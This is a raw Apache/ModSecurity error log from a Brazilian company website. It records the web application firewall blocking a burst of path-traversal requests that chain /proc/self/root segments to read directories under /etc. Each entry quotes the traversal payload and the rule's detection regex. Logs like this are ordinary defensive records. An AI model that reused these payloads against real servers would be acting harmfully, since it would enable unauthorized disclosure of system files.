"abgFhXbQATo66fKoS7xAWgAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:28:44.255139 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:39292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFjI6lpbStxTqkSktgsQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:29:13.583183 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:57894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFqbABkC4fWIHEf8HegQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:29:17.021274 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:59648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFrQlT9VtDQc7bgUyfogAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:30:15.768913 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.241.46:37226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF53jZBu2q05ozVU9IwAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:17.127482 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:39334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF6bysWC90G-1nBrA4ZQAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:18.404655 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:39486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF6v9ocpUE4ed4uDzghwAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:19.559298 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:39502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF6wlT9VtDQc7bgUyfvQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:20.873688 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:39512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF7HjZBu2q05ozVU9IwQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:21.311012 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:59652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF7bABkC4fWIHEf8HfBgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:30:23.130880 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:39524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF7wlT9VtDQc7bgUyfwQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:23.759540 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:49118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF7xXjF1vJNtV6CWrsaQAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:24.393343 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:39532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF8Jqj1wV0Si-Okefc6wAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:25.680944 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.241.46:39548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF8Zqj1wV0Si-Okefc7AAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:26.183315 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:49132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF8o6lpbStxTqkSktgvgAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:26.855457 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:39562] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF8o6lpbStxTqkSktgvwAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:29.237894 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:52074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF9Zqj1wV0Si-Okefc7wAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:30.493906 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:52088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF9v9ocpUE4ed4uDzgiQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:31.461447 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:49140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF95qj1wV0Si-Okefc8gAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:30:31.642539 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.241.46:52094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF95qj1wV0Si-Okefc8wAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:32.746187 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:39262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF-Jqj1wV0Si-Okefc9wAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:30:32.907486 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:52108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF-Jqj1wV0Si-Okefc-AAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:34.079568 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:52112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF-rysWC90G-1nBrA4agAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:35.074611 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:39274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 